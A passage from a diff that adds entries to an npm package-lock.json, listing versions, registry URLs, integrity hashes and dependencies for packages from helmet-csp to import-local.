"sha512-Rz953ZNEFk8sT2XvewXkYN0Ho4GEZdjAZy4stjiEQV3eN7GDxg1QKmYggH7otDyIA7uGA6XnUMVSgeJwbR5X+w==", + "dependencies": { + "bowser": "2.9.0", + "camelize": "1.0.0", + "content-security-policy-builder": "2.1.0", + "dasherize": "2.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/helmet-csp/node_modules/bowser": { + "version": "2.9.0", + "resolved": "https://registry.npmjs.org/bowser/-/bowser-2.9.0.tgz", + "integrity": "sha512-2ld76tuLBNFekRgmJfT2+3j5MIrP6bFict8WAIT3beq+srz1gcKNAdNKMqHqauQt63NmAa88HfP1/Ypa9Er3HA==" + }, + "node_modules/helmet/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/hexer": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/hexer/-/hexer-1.5.0.tgz", + "integrity": "sha512-dyrPC8KzBzUJ19QTIo1gXNqIISRXQ0NwteW6OeQHRN4ZuZeHkdODfj0zHBdOlHbRY8GqbqK57C9oWSvQZizFsg==", + "dependencies": { + "ansi-color": "^0.2.1", + "minimist": "^1.1.0", + "process": "^0.10.0", + "xtend": "^4.0.0" + }, + "bin": { + "hexer": "cli.js" + }, + "engines": { + "node": ">= 0.10.x" + } + }, + "node_modules/hexer/node_modules/process": { + "version": "0.10.1", + "resolved": "https://registry.npmjs.org/process/-/process-0.10.1.tgz", + "integrity": "sha512-dyIett8dgGIZ/TXKUzeYExt7WA6ldDzys9vTDU/cCA9L17Ypme+KzS+NjQCjpn9xsvi/shbMC+yP/BcFMBz0NA==", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/hexoid": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/hexoid/-/hexoid-1.0.0.tgz", + "integrity": "sha512-QFLV0taWQOZtvIRIAdBChesmogZrtuXvVWsFHZTk2SU+anspqZ2vMnoLg7IE1+Uk16N19APic1BuF8bC8c2m5g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/hide-powered-by": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/hide-powered-by/-/hide-powered-by-1.1.0.tgz", + "integrity": "sha512-Io1zA2yOA1YJslkr+AJlWSf2yWFkKjvkcL9Ni1XSUqnGLr/qRQe2UI3Cn/J9MsJht7yEVCe0SscY1HgVMujbgg==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/hoist-non-react-statics": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/hoist-non-react-statics/-/hoist-non-react-statics-3.3.2.tgz", + "integrity": "sha512-/gGivxi8JPKWNm/W0jSmzcMPpfpPLc3dY/6GxhX2hQ9iGj3aDfklV4ET7NjKpSinLpJ5vafa9iiGIEZg10SfBw==", + "dependencies": { + "react-is": "^16.7.0" + } + }, + "node_modules/hoist-non-react-statics/node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" + }, + "node_modules/hosted-git-info": { + "version": "2.8.9", + "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", + "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==", + "dev": true + }, + "node_modules/hpack.js": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/hpack.js/-/hpack.js-2.1.6.tgz", + "integrity": "sha512-zJxVehUdMGIKsRaNt7apO2Gqp0BdqW5yaiGHXXmbpvxgBYVZnAql+BJb4RO5ad2MgpbZKn5G6nMnegrH1FcNYQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "inherits": "^2.0.1", + "obuf": "^1.0.0", + "readable-stream": "^2.0.1", + "wbuf": "^1.1.0" + } + }, + "node_modules/hpack.js/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/hpack.js/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dev": true, + "license": "MIT", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/hpack.js/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dev": true, + "license": "MIT", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/hpkp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/hpkp/-/hpkp-2.0.0.tgz", + "integrity": "sha1-EOFCJk52IVpdMMROxD3mTe5tFnI=" + }, + "node_modules/hsts": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/hsts/-/hsts-2.2.0.tgz", + "integrity": "sha512-ToaTnQ2TbJkochoVcdXYm4HOCliNozlviNsg+X2XQLQvZNI/kCHR9rZxVYpJB3UPcHz80PgxRyWQ7PdU1r+VBQ==", + "dependencies": { + "depd": "2.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/hsts/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/html-encoding-sniffer": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/html-encoding-sniffer/-/html-encoding-sniffer-3.0.0.tgz", + "integrity": "sha512-oWv4T4yJ52iKrufjnyZPkrN0CH3QnrUqdB6In1g5Fe1mia8GmF36gnfNySxoZtxD5+NmYw1EElVXiBk93UeskA==", + "dev": true, + "dependencies": { + "whatwg-encoding": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/html-entities": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/html-entities/-/html-entities-2.5.2.tgz", + "integrity": "sha512-K//PSRMQk4FZ78Kyau+mZurHn3FH0Vwr+H36eE0rPbeYkRRi9YxceYPhuN60UwWorxyKHhqoAJl2OFKa4BVtaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/mdevils" + }, + { + "type": "patreon", + "url": "https://patreon.com/mdevils" + } + ] + }, + "node_modules/html-escaper": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", + "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "dev": true + }, + "node_modules/html-minifier-terser": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/html-minifier-terser/-/html-minifier-terser-6.1.0.tgz", + "integrity": "sha512-YXxSlJBZTP7RS3tWnQw74ooKa6L9b9i9QYXY21eUEvhZ3u9XLfv6OnFsQq6RxkhHygsaUMvYsZRV5rU/OVNZxw==", + "dev": true, + "dependencies": { + "camel-case": "^4.1.2", + "clean-css": "^5.2.2", + "commander": "^8.3.0", + "he": "^1.2.0", + "param-case": "^3.0.4", + "relateurl": "^0.2.7", + "terser": "^5.10.0" + }, + "bin": { + "html-minifier-terser": "cli.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/html-minifier-terser/node_modules/commander": { + "version": "8.3.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-8.3.0.tgz", + "integrity": "sha512-OkTL9umf+He2DZkUq8f8J9of7yL6RJKI24dVITBmNfZBmri9zYZQrKkuXiKhyfPSu8tUhnVBB1iKXevvnlR4Ww==", + "dev": true, + "engines": { + "node": ">= 12" + } + }, + "node_modules/html-parse-stringify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/html-parse-stringify/-/html-parse-stringify-3.0.1.tgz", + "integrity": "sha512-KknJ50kTInJ7qIScF3jeaFRpMpE8/lfiTdzf/twXyPBLAGrLRTmkz3AdTnKeh40X8k9L2fdYwEp/42WGXIRGcg==", + "dev": true, + "dependencies": { + "void-elements": "3.1.0" + } + }, + "node_modules/html-tags": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/html-tags/-/html-tags-3.3.1.tgz", + "integrity": "sha512-ztqyC3kLto0e9WbNp0aeP+M3kTt+nbaIveGmUxAtZa+8iFgKLUOD4YKM5j+f3QD89bra7UeumolZHKuOXnTmeQ==", + "dev": true, + "peer": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/html-webpack-plugin": { + "version": "5.5.3", + "resolved": "https://registry.npmjs.org/html-webpack-plugin/-/html-webpack-plugin-5.5.3.tgz", + "integrity": "sha512-6YrDKTuqaP/TquFH7h4srYWsZx+x6k6+FbsTm0ziCwGHDP78Unr1r9F/H4+sGmMbX08GQcJ+K64x55b+7VM/jg==", + "dev": true, + "dependencies": { + "@types/html-minifier-terser": "^6.0.0", + "html-minifier-terser": "^6.0.2", + "lodash": "^4.17.21", + "pretty-error": "^4.0.0", + "tapable": "^2.0.0" + }, + "engines": { + "node": ">=10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/html-webpack-plugin" + }, + "peerDependencies": { + "webpack": "^5.20.0" + } + }, + "node_modules/htmlparser2": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/htmlparser2/-/htmlparser2-6.1.0.tgz", + "integrity": "sha512-gyyPk6rgonLFEDGoeRgQNaEUvdJ4ktTmmUh/h2t7s+M8oPpIPxgNACWa+6ESR57kXstwqPiCut0V8NRpcwgU7A==", + "dev": true, + "funding": [ + "https://github.com/fb55/htmlparser2?sponsor=1", + { + "type": "github", + "url": "https://github.com/sponsors/fb55" + } + ], + "dependencies": { + "domelementtype": "^2.0.1", + "domhandler": "^4.0.0", + "domutils": "^2.5.2", + "entities": "^2.0.0" + } + }, + "node_modules/http-deceiver": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/http-deceiver/-/http-deceiver-1.2.7.tgz", + "integrity": "sha512-LmpOGxTfbpgtGVxJrj5k7asXHCgNZp5nLfp+hWc8QQRqtb7fUy6kRY3BO1h9ddF6yIPYUARgxGOwB42DnxIaNw==", + "dev": true, + "license": "MIT" + }, + "node_modules/http-errors": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.0.tgz", + "integrity": "sha512-FtwrG/euBzaEjYeRqOgly7G0qviiXoJWnvEH2Z1plBdXgbyjv34pHTSb9zoeHMyDy33+DWy5Wt9Wo+TURtOYSQ==", + "dependencies": { + "depd": "2.0.0", + "inherits": "2.0.4", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "toidentifier": "1.0.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-errors/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-errors/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-graceful-shutdown": { + "version": "3.1.13", + "resolved": "https://registry.npmjs.org/http-graceful-shutdown/-/http-graceful-shutdown-3.1.13.tgz", + "integrity": "sha512-Ci5LRufQ8AtrQ1U26AevS8QoMXDOhnAHCJI3eZu1com7mZGHxREmw3dNj85ftpQokQCvak8nI2pnFS8zyM1M+Q==", + "dev": true, + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/http-graceful-shutdown/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/http-graceful-shutdown/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/http-parser-js": { + "version": "0.5.10", + "resolved": "https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz", + "integrity": "sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==", + "dev": true, + "license": "MIT" + }, + "node_modules/http-proxy": { + "version": "1.18.1", + "resolved": "https://registry.npmjs.org/http-proxy/-/http-proxy-1.18.1.tgz", + "integrity": "sha512-7mz/721AbnJwIVbnaSv1Cz3Am0ZLT/UBwkC92VlxhXv/k/BBQfM2fXElQNC27BVGr0uwUpplYPQM9LnaBMR5NQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "eventemitter3": "^4.0.0", + "follow-redirects": "^1.0.0", + "requires-port": "^1.0.0" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/http-proxy-agent": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz", + "integrity": "sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==", + "dependencies": { + "@tootallnate/once": "2", + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/http-proxy-middleware": { + "version": "2.0.9", + "resolved": "https://registry.npmjs.org/http-proxy-middleware/-/http-proxy-middleware-2.0.9.tgz", + "integrity": "sha512-c1IyJYLYppU574+YI7R4QyX2ystMtVXZwIdzazUIPIJsHuWNd+mho2j+bKoHftndicGj9yh+xjd+l0yj7VeT1Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/http-proxy": "^1.17.8", + "http-proxy": "^1.18.1", + "is-glob": "^4.0.1", + "is-plain-obj": "^3.0.0", + "micromatch": "^4.0.2" + }, + "engines": { + "node": ">=12.0.0" + }, + "peerDependencies": { + "@types/express": "^4.17.13" + }, + "peerDependenciesMeta": { + "@types/express": { + "optional": true + } + } + }, + "node_modules/http-proxy-middleware/node_modules/is-plain-obj": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-plain-obj/-/is-plain-obj-3.0.0.tgz", + "integrity": "sha512-gwsOE28k+23GP1B6vFl1oVh/WOzmawBrKwo5Ev6wMKzPkaXaCDIQKzLnvsA42DRlbVTWorkgTKIviAKCWkfUwA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/http-signature": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", + "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^1.2.2", + "sshpk": "^1.7.0" + }, + "engines": { + "node": ">=0.8", + "npm": ">=1.3.7" + } + }, + "node_modules/http-signature/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/http-status": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/http-status/-/http-status-1.5.0.tgz", + "integrity": "sha512-wcGvY31MpFNHIkUcXHHnvrE4IKYlpvitJw5P/1u892gMBAM46muQ+RH7UN1d+Ntnfx5apnOnVY6vcLmrWHOLwg==", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/https-proxy-agent": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.0.tgz", + "integrity": "sha512-EkYm5BcKUGiduxzSt3Eppko+PiNWNEpa4ySk9vTC6wDsQJW9rHSa+UhGNJoRYp7bz6Ht1eaRIa6QaJqO5rCFbA==", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/human-signals": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-1.1.1.tgz", + "integrity": "sha512-SEQu7vl8KjNL2eoGBLF3+wAjpsNfA9XMlXAYj/3EdaNfAlxKthD1xjEQfGOUhllCGGJVNY34bRr6lPINhNjyZw==", + "dev": true, + "engines": { + "node": ">=8.12.0" + } + }, + "node_modules/hyperdyperid": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hyperdyperid/-/hyperdyperid-1.2.0.tgz", + "integrity": "sha512-Y93lCzHYgGWdrJ66yIktxiaGULYc6oGiABxhcO5AufBeOyoIdZF7bIfLaOrbM0iGIOXQQgxxRrFEnb+Y6w1n4A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10.18" + } + }, + "node_modules/hyphenate-style-name": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/hyphenate-style-name/-/hyphenate-style-name-1.0.4.tgz", + "integrity": "sha512-ygGZLjmXfPHj+ZWh6LwbC37l43MhfztxetbFCoYTM2VjkIUpeHgSNn7QIyVFj7YQ1Wl9Cbw5sholVJPzWvC2MQ==" + }, + "node_modules/i18next": { + "version": "23.10.0", + "resolved": "https://registry.npmjs.org/i18next/-/i18next-23.10.0.tgz", + "integrity": "sha512-/TgHOqsa7/9abUKJjdPeydoyDc0oTi/7u9F8lMSj6ufg4cbC1Oj3f/Jja7zj7WRIhEQKB7Q4eN6y68I9RDxxGQ==", + "funding": [ + { + "type": "individual", + "url": "https://locize.com" + }, + { + "type": "individual", + "url": "https://locize.com/i18next.html" + }, + { + "type": "individual", + "url": "https://www.i18next.com/how-to/faq#i18next-is-awesome.-how-can-i-support-the-project" + } + ], + "dependencies": { + "@babel/runtime": "^7.23.2" + } + }, + "node_modules/i18next-fs-backend": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/i18next-fs-backend/-/i18next-fs-backend-2.3.1.tgz", + "integrity": "sha512-tvfXskmG/9o+TJ5Fxu54sSO5OkY6d+uMn+K6JiUGLJrwxAVfer+8V3nU8jq3ts9Pe5lXJv4b1N7foIjJ8Iy2Gg==" + }, + "node_modules/i18next-http-middleware": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/i18next-http-middleware/-/i18next-http-middleware-3.5.0.tgz", + "integrity": "sha512-BqATaFCMVHJYZX4cBmhvpBqZNvnvjjmcSzxJvLWTwgJ4gn5kwYoyVikn7AB5kxiQrFjSuZsjDFv76CdsAHwpZw==" + }, + "node_modules/i18next-scanner": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/i18next-scanner/-/i18next-scanner-4.4.0.tgz", + "integrity": "sha512-bgnVEfoFHLVxfXNQtsFFzexB/5kwgDZZkZ6+AnCmyaFKEQQbtMkgPgLHlMZ0deIIEG6KN/tYAus5ZJzng2Ac9g==", + "dev": true, + "dependencies": { + "acorn": "^8.0.4", + "acorn-jsx": "^5.3.1", + "acorn-stage3": "^4.0.0", + "acorn-walk": "^8.0.0", + "chalk": "^4.1.0", + "clone-deep": "^4.0.0", + "commander": "^9.0.0", + "deepmerge": "^4.0.0", + "ensure-type": "^1.5.0", + "eol": "^0.9.1", + "esprima-next": "^5.7.0", + "gulp-sort": "^2.0.0", + "i18next": "*", + "lodash": "^4.0.0", + "parse5": "^6.0.0", + "sortobject": "^4.0.0", + "through2": "^4.0.0", + "vinyl": "^3.0.0", + "vinyl-fs": "^4.0.0" + }, + "bin": { + "i18next-scanner": "bin/cli.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/i18next-scanner/node_modules/acorn": { + "version": "8.10.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.10.0.tgz", + "integrity": "sha512-F0SAmZ8iUtS//m8DmCTA0jlh6TDKkHQyK6xc6V4KDTyZKA9dnvX9/3sRTVQrWm79glUAZbnmmNcdYwUIHWVybw==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/i18next-scanner/node_modules/acorn-walk": { + "version": "8.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-8.2.0.tgz", + "integrity": "sha512-k+iyHEuPgSw6SbuDpGQM+06HQUa04DZ3o+F6CSzXMvvI5KMvnaEqXe+YVe555R9nn6GPt404fos4wcgpw12SDA==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/i18next-scanner/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/i18next-scanner/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/i18next-scanner/node_modules/commander": { + "version": "9.5.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-9.5.0.tgz", + "integrity": "sha512-KRs7WVDKg86PWiuAqhDrAQnTXZKraVcCc6vFdL14qrZ/DcWwuRo7VoiYXalXO7S5GKpqYiVEwCbgFDfxNHKJBQ==", + "dev": true, + "engines": { + "node": "^12.20.0 || >=14" + } + }, + "node_modules/i18next-scanner/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/iconv-lite": { + "version": "0.4.24", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", + "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/icss-utils": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/icss-utils/-/icss-utils-5.1.0.tgz", + "integrity": "sha512-soFhflCVWLfRNOPU3iv5Z9VUdT44xFRbzjLsEzSr5AQmgqPMTHdU3PMT1Cf1ssx8fLNJDA1juftYl+PUcv3MqA==", + "dev": true, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/ieee754": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.13.tgz", + "integrity": "sha512-4vf7I2LYV/HaWerSo3XmlMkp5eZ83i+/CDluXi/IGTs/O1sejBNhTtnxzmRZfvOUqj7lZjqHkeTvpgSFDlWZTg==" + }, + "node_modules/ignore": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.3.1.tgz", + "integrity": "sha512-5Fytz/IraMjqpwfd34ke28PTVMjZjJG2MPn5t7OE4eUCUNf8BAa7b5WUS9/Qvr6mwOQS7Mk6vdsMno5he+T8Xw==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/ignore-by-default": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/ignore-by-default/-/ignore-by-default-1.0.1.tgz", + "integrity": "sha512-Ius2VYcGNk7T90CppJqcIkS5ooHUZyIQK+ClZfMfMNFEF9VSE73Fq+906u/CWu92x4gzZMWOwfFYckPObzdEbA==", + "dev": true + }, + "node_modules/image-size": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/image-size/-/image-size-0.5.5.tgz", + "integrity": "sha1-Cd/Uq50g4p6xw+gLiZA3jfnjy5w=", + "dev": true, + "optional": true, + "bin": { + "image-size": "bin/image-size.js" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/immutable": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/immutable/-/immutable-4.3.5.tgz", + "integrity": "sha512-8eabxkth9gZatlwl5TBuJnCsoTADlL6ftEr7A4qgdaTsPyreilDSnUk57SO+jfKcNtxPa22U5KK6DSeAYhpBJw==", + "dev": true + }, + "node_modules/import-fresh": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", + "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", + "dependencies": { + "parent-module": "^1.0.0", + "resolve-from": "^4.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/import-fresh/node_modules/resolve-from": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", + "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", + "engines": { + "node": ">=4" + } + }, + "node_modules/import-in-the-middle": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/import-in-the-middle/-/import-in-the-middle-1.4.2.tgz", + "integrity": "sha512-9WOz1Yh/cvO/p69sxRmhyQwrIGGSp7EIdcb+fFNVi7CzQGQB8U1/1XrKVSbEd/GNOAeM0peJtmi7+qphe7NvAw==", + "dependencies": { + "acorn": "^8.8.2", + "acorn-import-assertions": "^1.9.0", + "cjs-module-lexer": "^1.2.2", + "module-details-from-path": "^1.0.3" + } + }, + "node_modules/import-in-the-middle/node_modules/acorn": { + "version": "8.10.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.10.0.tgz", + "integrity": "sha512-F0SAmZ8iUtS//m8DmCTA0jlh6TDKkHQyK6xc6V4KDTyZKA9dnvX9/3sRTVQrWm79glUAZbnmmNcdYwUIHWVybw==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/import-in-the-middle/node_modules/acorn-import-assertions": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/acorn-import-assertions/-/acorn-import-assertions-1.9.0.tgz", + "integrity": "sha512-cmMwop9x+8KFhxvKrKfPYmN6/pKTYYHBqLa0DfvVZcKMJWNyWLnaqND7dx/qn66R7ewM1UX5XMaDVP5wlVTaVA==", + "peerDependencies": { + "acorn": "^8" + } + }, + "node_modules/import-local": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", + "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", + "dev": true, + "dependencies": { 